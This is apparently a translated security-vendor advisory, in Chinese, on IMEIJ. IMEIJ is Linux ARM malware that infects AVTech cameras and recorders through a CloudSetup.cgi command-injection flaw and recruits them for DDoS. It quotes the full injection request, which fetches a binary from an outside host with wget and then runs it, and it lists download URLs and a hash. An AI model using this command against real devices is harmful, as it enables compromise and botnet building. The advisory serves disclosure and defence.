長久以來，Linux 一直是企業平台與物聯網（IoT ,Internet of Thing）裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統，並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及，針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅，其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現，並且在 2016 年 10 月公開揭露。不過在此之前，Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞：

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 https://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點，它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上，前述網站指令會讓裝置下載惡意檔案，並且將檔案設定成可執行檔。

圖 1：IMEIJ 的感染流程。

AVTech 有許多連上網際網路的裝置都可能感染這個新的 Linux 惡意程式，包括：IP 攝影機、監視錄影設備，以及支援 AVTech 雲端服務的網路錄影機。一旦惡意程式安裝到裝置上，它就能蒐集裝置的系統資訊和網路活動資料。此外，它還可執行遠端駭客所下的指令，發動分散式阻斷服務攻擊 (DDoS)攻擊，然後自行停止。受感染的裝置還可能讓同一網路上的其他裝置陷入危險。

IMEIJ 有三個下載網址，分別位於兩家不同的 ISP：

• hxxp://172.247.116.3:8080/Arm1
• hxxp://172.247.116.21:85/Arm1
• hxxp://192.154.108.2:8080/Arm1

以上 IP 都是屬於南韓的 ISP 所有。

根據 Search-Lab 指出，目前網際網路上可搜尋到的 AVTech 裝置數量超過 13 萬台，這些裝置都有可能成為這項攻擊的目標。此外，這些裝置還可能變成殭屍電腦，讓駭客發動大規模 DDoS 攻擊。如同大多數連網裝置一樣，這些受害裝置出廠時就缺乏足夠的安全性，而且無法直接監控。

IMEIJ 的 DDoS 攻擊能力或許會讓人聯想到 Mirai，但兩者之間有些差別：

IMEIJ 是最近發現的多個 ARM 平台 Linux 惡意程式之一。ARM 是物聯網和行動裝置廣泛採用的平台，也是駭客攻擊這類裝置必備的技能之一。近期發現的 Linux 惡意程式除了 IMEIJ 之外還有 Umbreon Rootkit (趨勢科技命名為 ELF_UMBREON) 以及 LuaBot (趨勢科技命名為 ELF_LUABOT)。

趨勢科技PC-cillin雲端版能有效防範這項威脅，在端點裝置上偵測惡意程式。若要保護連網的裝置，可採用趨勢科技 Home Network Security 來檢查路由器和連線裝置之間的網路流量。企業機構則可採用趨勢科技的Deep Discovery Inspector網路裝置來監控所有連接埠及 105 種以上的網路通訊協定以偵測進階威脅和針對性攻擊。

IMEIJ 的 SHA256 雜湊碼如下：

8040422762138d28aa411d8bb2307a93432416f72b292bf884fb7c7efde9f3f5

原文出處：New Linux Malware Exploits CGI Vulnerability 作者：Jeanne Jocson 和 Jennifer Gumban